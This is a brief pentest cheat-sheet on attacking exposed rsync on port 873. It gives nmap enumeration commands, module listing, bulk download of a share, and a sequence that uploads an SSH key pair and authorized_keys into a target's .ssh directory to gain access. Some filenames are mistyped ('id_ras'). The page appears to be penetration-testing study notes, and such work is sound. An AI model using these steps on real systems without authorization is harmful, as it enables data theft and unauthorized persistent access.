Skip to content

873 - Pentesting rsync

Rsync is a fast and versatile file synchronization and backup utility for Unix-based systems. It allows users to synchronize files between two or more systems over a network, either by copying files from one system to another or by updating only the files that have changed.

nmap

sudo nmap -p 873 -A $IP

sudo nmap -sV --script "rsync-list-modules" -p 873 $(target)

rsync

rsync -av --list-only rsync://<user>@$(target)/<dir_name>
copy all files to local machine 
rsync -av rsync://rsync-connect@$(target)/files /home/kali/workspace/rsyn_files
upload files to remove machine* 
chmod 600 id_ras
chmod 600 id_ras.pub
rsync -av /home/kali/workspace/.ssh/id_rsa rsync://rsync-connect@$(target)/files/sys-internal/.ssh/
rsync -av /home/kali/workspace/.ssh/id_rsa.pub rsync://rsync-connect@$(target)/files/sys-internal/.ssh/
cat id_ras.pub | tee authorized_keys
chmod 600 id_ras
chmod 600 id_ras.pub
chmod 600 authorized_keys
rsync -av /home/kali/workspace/.ssh/authorized_keys rsync://rsync-connect@$(target)/files/sys-internal/.ssh/